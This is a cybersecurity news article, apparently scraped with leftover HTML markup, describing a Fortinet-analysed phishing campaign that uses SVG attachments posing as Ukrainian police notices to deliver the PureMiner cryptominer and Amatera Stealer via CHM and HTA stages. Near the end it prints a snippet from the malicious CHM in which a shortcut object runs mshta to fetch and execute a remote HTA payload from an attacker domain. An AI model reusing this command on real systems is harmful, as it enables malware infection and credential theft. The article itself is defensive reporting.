In recent weeks, a sophisticated phishing campaign has emerged, targeting organizations in Ukraine with malicious Scalable Vector Graphics (SVG) files designed to propagate the PureMiner cryptominer and a data-stealing payload dubbed Amatera Stealer.<\/p>\n
Attackers masquerade as the Ukrainian police, sending emails that claim recipients have pending appeals.<\/p>\n
When victims open the attached SVG, it triggers a fileless attack chain that ultimately compromises system confidentiality and hijacks computing resources.<\/p>\n
This novel use of SVG attachments as initial infection vectors demonstrates attackers\u2019 increasing creativity in bypassing traditional email filters and endpoint protections.<\/p>\n
Upon opening the SVG attachment, an embedded HTML iframe element silently loads a second SVG from an attacker-controlled domain.<\/p>\n
That SVG presents a spoofed<\/a> Adobe Reader interface with a \u201cPlease wait, your document is loading\u2026\u201d message in Ukrainian, while simultaneously downloading a password-protected archive.<\/p>\n Victims are shown the archive password and urged to extract a Compiled HTML Help (CHM) file. Fortinet analysts noted<\/a> the malware\u2019s reliance on this deceptive user interaction to evade detection and lure victims into executing malicious content.<\/p>\n Inside the archive, a CHM file contains an HTML shortcut object that invokes an HTML Application (HTA) in hidden mode.<\/p>\n The HTA script, obfuscated through string encoding and array shuffling, serves as a loader\u2014establishing a persistent connection to the attacker\u2019s server, exfiltrating<\/a> system information via XorBase64-encoded HTTP POST requests, and awaiting further commands.<\/p>\n A snippet from the malicious HTM extracted from the CHM illustrates how the Click method spawns mshta.exe to fetch and execute the next-stage payload:-<\/p>\n The infection mechanism continues with two distinct fileless payload deliveries. In the first, a ZIP archive named ergosystem.zip contains a legitimate .NET tool that sideloads a malicious DLL<\/a> using process hollowing.<\/p>\n The injected payload, identified as PureMiner, decrypts its configuration from a Protobuf-serialized blob, gathers hardware details using AMD and NVIDIA libraries, and initiates CPU- or GPU-based mining modules.<\/p>\n In the second archive, smtpB.zip, a Python interpreter and the PythonMemoryModule are leveraged to load Amatera Stealer directly into memory.<\/p>\n This stealer requests an RC4-encrypted configuration via HTTP GET, decodes it in memory, and parses directives to harvest credentials, browser artifacts, and cryptocurrency wallet<\/a> files.<\/p>\n From initial SVG deployment to dual payload execution, this campaign exemplifies a seamless progression of fileless tactics and legitimate application misuse.<\/p>\n By weaponizing SVG files as HTML wrappers and chaining through CHM and HTA stages, attackers evade signature-based defenses and exploit users\u2019 trust in common document formats.<\/p>\n Cybersecurity teams should inspect SVG attachments for embedded iframes and monitor<\/a> mshta.exe invocations, while ensuring that CHM and HTA executions are restricted.<\/p>\n Proper URL filtering and archive password prompts coupled with endpoint behavioral analytics can disrupt this infection mechanism before it compromises data or hijacks system resources.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post Hackers Weaponizing SVG Files to Deliver PureMiner Malware and Steal Sensitive Information<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjBdVVc5Z4N7VlXd6vjl61WJ4r-R1Um_gLFu5oz4fkLoCoWv7ErJayQoS83vKSbuCO46g-i_SDgodFK3S6898oTA0TPpGA4zRdA64rWoa8HOWpD29UKn6O-cLdeZtUZXg_VFDOjH-uyV2VaItnJFKcqL2fiRzXvleWcHx4WB4Ylrs-vUzXfeFYlVuu70j8\/s16000\/Spoofed%2520Adobe%2520Reader%2520interface%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\")
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhnEgMsDowLlW5J4SYlbCloCn8taCtTuRzBU_Z1joU1WYHp_1AGsn28xwvEpahfQcbgAotBxA3EvZtwp8u4LSNoPphCTuQTaZfgLpxNpyAwRQrr7D92LKe_oPoOtcsgKjz2FSmx0QXtycm6B8Fkniyqivc2BYSZNiSkBRmYycICmtXef2i8BqtuCECrjdM\/s16000\/Malicious%2520HTM%2520file%2520extracted%2520from%2520the%2520CHM%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\")
Infection Mechanism of PureMiner via an SVG-Based Fileless Chain<\/strong><\/h2>\n
[OBJECT id=\"shortcut\" classid=\"clsid:52a2aaae-085d-4187-97ea-8c30db990436\" width=\"1\" height=\"1\"]\n [PARAM name=\"Command\" value=\"ShortCut\"]\n [PARAM name=\"Item1\" value=\",cmd,\/c mshta https:\/\/ms-team-ping2.com\/smtp_test.hta\"]\n[\/OBJECT]\n[SCRIPT]shortcut.Click();[\/SCRIPT]<\/code><\/pre>\n![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEiLv_bWgkY12pMdL4cC9scSlyyzjOFLnWtehwhr6gq2-aSY3oS57NyGi9fw_uKMVwREIq3Aw4QlJ8A8BAau9IPZnGKG305kiZZ_dtycOenQIB0I5RM5o1cL5WFhOtd9mUa3jURUqVykjSE_yYkR2ZXmd1rN1KPHWnEmD4ltvxolHAzplJ90_oB3tEgF8pE\/s16000\/Attack%2520chain%2520%28Source%2520-%2520Fortinet%29.webp?ssl=1\")